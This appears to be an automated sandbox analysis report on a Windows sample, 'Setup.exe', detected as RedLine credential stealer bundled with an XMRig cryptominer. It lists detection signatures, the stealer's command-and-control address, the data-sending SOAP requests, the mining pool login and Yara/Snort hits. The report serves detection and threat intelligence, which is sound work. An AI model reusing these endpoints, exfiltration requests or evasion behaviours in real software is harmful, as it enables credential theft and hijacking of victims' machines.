Windows Analysis Report
Setup.exe

Overview

General Information

Sample name: Setup.exe
Analysis ID: 1464883
MD5: 3ba515e7df4c8918a967f4043cd8c72b
SHA1: 3659a765f502297fb92a9d14b08e5b8d91bc8603
SHA256: 5234a3b9c46390f23a13c401cd294dadc63944ed57a19b26ff4e7211442e0482
Tags: exe
Infos:

Detection

RedLine, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop EventLog
Snort IDS alert for network traffic
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Detected Stratum mining protocol
Drops PE files to the user root directory
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sigma detected: Legitimate Application Dropped Archive
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Process Parents
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Name Description Attribution Blogpost URLs Link
xmrig According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Setup.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Avira: detection malicious, Label: TR/ClipBanker.leoyb
Found malware configuration
Source: 10.0.fix.exe.720000.0.unpack Malware Configuration Extractor: RedLine {"C2 url": ["163.5.160.27:51523"], "Bot Id": "telegramone"}
Multi AV Scanner detection for domain / URL
Source: pool.hashvault.pro Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Virustotal: Detection: 63% Perma Link
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe ReversingLabs: Detection: 95%
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Virustotal: Detection: 63% Perma Link
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Virustotal: Detection: 66% Perma Link
Multi AV Scanner detection for submitted file
Source: Setup.exe Virustotal: Detection: 59% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Setup.exe Joe Sandbox ML: detected

Bitcoin Miner
barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 54.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000036.00000002.2912448756.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Detected Stratum mining protocol
Source: global traffic TCP traffic: 192.168.2.4:49740 -> 95.179.241.203:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4agh8zkebtmi6nakn8kytbecuawowbajkj6vedxzmsipjtkywtf1hhadafjn39jtrsxipbhsszqnt2u1jycpsaedmhft2qq","pass":"mergedall","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
Found strings related to Crypto-Mining
Source: conhost.exe String found in binary or memory: cryptonight-monerov7
Uses 32bit PE files
Source: Setup.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F8AF0 FindFirstFileExW,FindClose, 6_2_00007FF7F04F8AF0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 6_2_00007FF7F050842C
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F05124C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 6_2_00007FF7F05124C4
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 6_2_00007FF7F050842C
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD24C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_00007FF702BD24C4
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 18_2_00007FF702BC842C
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BB8AF0 FindFirstFileExW,FindClose, 18_2_00007FF702BB8AF0
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 18_2_00007FF702BC842C
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 015193DCh 7_2_01519118
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 0151BC38h 7_2_0151B740
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DE9567h 7_2_05DE8E08
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DECFD2h 7_2_05DECBB0
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DED452h 7_2_05DECBB0
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_05DEFA88
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then inc dword ptr [ebp-20h] 7_2_05DE25D8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DEB581h 7_2_05DEB569
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DEE455h 7_2_05DEE434
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DEC9E5h 7_2_05DEC618
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DEC9E5h 7_2_05DEC60A
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DEF3E2h 7_2_05DEF130

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49731 -> 51.195.206.227:38719
Source: Traffic Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49731 -> 51.195.206.227:38719
Source: Traffic Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 51.195.206.227:38719 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 51.195.206.227:38719 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.4:57809 -> 1.1.1.1:53
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 163.5.160.27:51523
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 51.195.206.227 ports 1,38719,3,7,8,9
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49743
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 51.195.206.227:38719
Source: global traffic TCP traffic: 192.168.2.4:49732 -> 163.5.160.27:51523
Source: global traffic TCP traffic: 192.168.2.4:49740 -> 95.179.241.203:3333
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 163.5.160.27:51523Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 163.5.160.27:51523Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 163.5.160.27:51523Content-Length: 1037846Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 163.5.160.27:51523Content-Length: 1037838Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 95.179.241.203 95.179.241.203
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Source: Joe Sandbox View ASN Name: EPITECHFR EPITECHFR
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE10306260 recv, 19_2_00007FFE10306260
Source: global traffic DNS traffic detected: DNS query: api.ip.sb
Source: global traffic DNS traffic detected: DNS query: pool.hashvault.pro
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 163.5.160.27:51523Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000001.00000002.1831456949.0000000007983000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m/
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: powershell.exe, 00000001.00000002.1795425039.0000000006349000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000001.00000002.1781685516.0000000005436000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1780597346.00000000033B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1781685516.0000000005436000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1781685516.00000000052E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1781685516.0000000005436000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.1781685516.0000000005436000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1780597346.00000000033B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000001.00000002.1781685516.00000000052E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: Setup.exe, 00000000.00000002.1690804968.00000000030F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: powershell.exe, 00000001.00000002.1795425039.0000000006349000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1795425039.0000000006349000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1795425039.0000000006349000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1781685516.0000000005436000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1780597346.00000000033B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: powershell.exe, 00000001.00000002.1795425039.0000000006349000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 10.0.fix.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 10.0.fix.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.Setup.exe.313a458.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.Setup.exe.313a458.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.Setup.exe.313a458.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.Setup.exe.313a458.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 54.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 54.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 54.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0000000A.00000000.1686994806.0000000000722000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000036.00000002.2912448756.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: Setup.exe PID: 6184, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\AppData\Local\Temp\fix.exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\AppData\Local\Temp\fix.exe, type: DROPPED Matched rule: Detects RedLine infostealer Author: ditekSHen
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Code function: 3_2_00007FF7010C1394 NtWriteFileGather, 3_2_00007FF7010C1394
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Code function: 38_2_00007FF7A81D1394 NtDisplayString, 38_2_00007FF7A81D1394
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Code function: 43_2_00007FF7ECBC1394 NtAlpcImpersonateClientOfPort, 43_2_00007FF7ECBC1394
Source: C:\Windows\System32\conhost.exe Code function: 52_2_0000000140001394 NtQueryAttributesFile, 52_2_0000000140001394
Creates driver files
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe File created: C:\Windows\TEMP\trxhxvjzqipl.sys
Deletes files inside the Windows folder
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_x4hrlidv.enb.ps1
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0337B580 1_2_0337B580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0337B570 1_2_0337B570
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Code function: 3_2_00007FF7010C3B50 3_2_00007FF7010C3B50
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F7950 6_2_00007FF7F04F7950
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F9B8B 6_2_00007FF7F04F9B8B
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F051789C 6_2_00007FF7F051789C
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0516950 6_2_00007FF7F0516950
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050AA10 6_2_00007FF7F050AA10
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0508278 6_2_00007FF7F0508278
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0502270 6_2_00007FF7F0502270
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050EA90 6_2_00007FF7F050EA90
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0503330 6_2_00007FF7F0503330
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0517350 6_2_00007FF7F0517350
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0516BCC 6_2_00007FF7F0516BCC
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0502474 6_2_00007FF7F0502474
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050842C 6_2_00007FF7F050842C
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0514CFC 6_2_00007FF7F0514CFC
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0506510 6_2_00007FF7F0506510
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F05124C4 6_2_00007FF7F05124C4
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0503CC0 6_2_00007FF7F0503CC0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0508CB0 6_2_00007FF7F0508CB0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04FA55D 6_2_00007FF7F04FA55D
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050842C 6_2_00007FF7F050842C
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F9D2B 6_2_00007FF7F04F9D2B
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0511518 6_2_00007FF7F0511518
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050E5FC 6_2_00007FF7F050E5FC
